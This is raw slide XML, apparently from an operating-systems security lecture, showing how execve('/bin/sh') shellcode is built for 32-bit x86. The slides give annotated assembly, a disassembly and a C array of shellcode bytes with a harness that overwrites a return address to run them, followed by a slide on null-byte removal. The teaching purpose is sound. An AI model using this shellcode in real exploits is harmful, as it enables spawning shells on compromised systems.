              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        # get string into 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 err="1"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, string-end(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)      # null terminate string</a:t>
            </a:r>
          </a:p>
          <a:p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array-0-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)  # store address of string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, array-1-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)  # null terminate array</a:t>
            </a:r>
          </a:p>
          <a:p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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # put a null in 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 err="1"/>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> array-0-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  # put array in 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 err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0xb, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> number for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve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 $0x80                       # trap to kernel</a:t>
            </a:r>
          </a:p>
          <a:p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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # set exit status of 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> number for exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $0x80                       # trap to kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.string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5898968"/>
            <a:ext cx="6477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How to know the address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1489213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2133600"/>
            <a:ext cx="541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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> call-offset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>call jump-offset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>"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4038600"/>
            <a:ext cx="7620000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When executing the call instruction, the machine pushes the address of the instruction immediately following it onto the stack. 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417403"/>
            <a:ext cx="762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dirty="0" err="1"/>
              <a:t>popl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to obtain the address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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6911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4953000"/>
            <a:ext cx="7315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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\0addrnull</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>string-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 0x7 since the string is 7 characters long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>array-0-offset: 0x8 to begin the array just after the null character in the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>array-1-offset: 0xc, 4 bytes after array-0-offset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323195"/>
            <a:ext cx="9296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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> call-offset                  # (2)</a:t>
            </a:r>
          </a:p>
          <a:p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                        # (1) get string into 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 err="1"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, string-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)      # (4) null terminate string</a:t>
            </a:r>
          </a:p>
          <a:p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array-0-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)  # (3) store address of string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, array-1-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)  # (7) null terminate array</a:t>
            </a:r>
          </a:p>
          <a:p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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # (5) put a null in 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 err="1"/>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> array-0-offset(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  # (3) put array in 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 err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0xb, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # (5) set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> number for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r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 $0x80                       # (2) trap to kernel</a:t>
            </a:r>
          </a:p>
          <a:p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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # (5) set exit status of 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  # (5) set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> number for exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $0x80                       # (2) trap to kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call jump-offset                 # (5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.string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98562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188" y="168275"/>
            <a:ext cx="7821612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Security Measure Levels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744538"/>
            <a:ext cx="8839200" cy="4921250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Impossible to have absolute security, but make cost to perpetrator sufficiently high to deter most intruders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Security must occur at four levels to be effective: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Physical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Data centers, servers, connected terminals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Human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Avoid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social engineering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phishing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dumpster diving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Operating System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Protection mechanisms, debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Network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Intercepted communications, interruption, DOS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Security is as weak as the weakest link in the chain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But can too much security be a problem?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1217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38200" y="914400"/>
            <a:ext cx="80772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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  main+0x2f                 # (5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a: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                      # (1) get string into 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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, 0x7(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)           # (4) null terminate string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0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)           # (3) store address of string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0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)           # (7) null terminate array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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                # (5) put a null in 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leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>           # (3) put array in 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$0xb, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                # (5) set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> number for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve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                     # (2) trap to kernel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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                # (5) set exit status of 0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$0x1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                # (5) set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> number for exit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                     # (2) trap to kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  call main+0x5                  # (5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .string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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .type   main, @function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="540139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990600"/>
            <a:ext cx="83820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 80483b4:   e9 2a 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    80483e3 &lt;main+0x2f&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483b9:   5b                      pop    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483ba:   c6 43 07 00             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>   $0x0,0x7(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483be:   89 5b 08                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    %ebx,0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483c1:   c7 43 0c 00 00 00 00    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>   $0x0,0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483c8:   ba 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    $0x0,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483cd:   8d 4b 08                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483d0:   b8 0b 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483d5:   cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483d7:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    $0x0,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483dc:   b8 01 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    $0x1,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483e1:   cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483e3:   e8 d1 ff ff ff          call   80483b9 &lt;main+0x5&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483e8:   2f                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>das</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483e9:   62 69 6e                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>bound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>  %ebp,0x6e(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483ec:   2f                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>das</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 80483ed:   73 68                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>jae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>    8048457 &lt;__libc_csu_init+0x67&gt;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72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425029"/>
            <a:ext cx="8305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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[] = "\xe9\x2a\x00\x00\x00\x5b\xc6\x43\x07\x00"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  "\x89\x5b\x08\xc7\x43\x0c\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x00\x00\x00\x00"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  "\x8d\x4b\x08\xb8\x0b\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x00\x00\x00\x00"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  "\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x80\xe8\xd1\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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>void shell()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*ret; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  (*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode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main() { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   shell();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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14382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Null Characters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381065"/>
            <a:ext cx="3733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main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  main+0x2f                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a: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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x0, 0x7(%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0x8(%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0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), 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$0xb,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ebx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call main+0x5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .string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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  .type   main, @function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1676400"/>
            <a:ext cx="816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eb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2a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4888" y="1677778"/>
            <a:ext cx="2595512" cy="400110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33169" y="2266019"/>
            <a:ext cx="30565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Long jump -&gt; short jump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
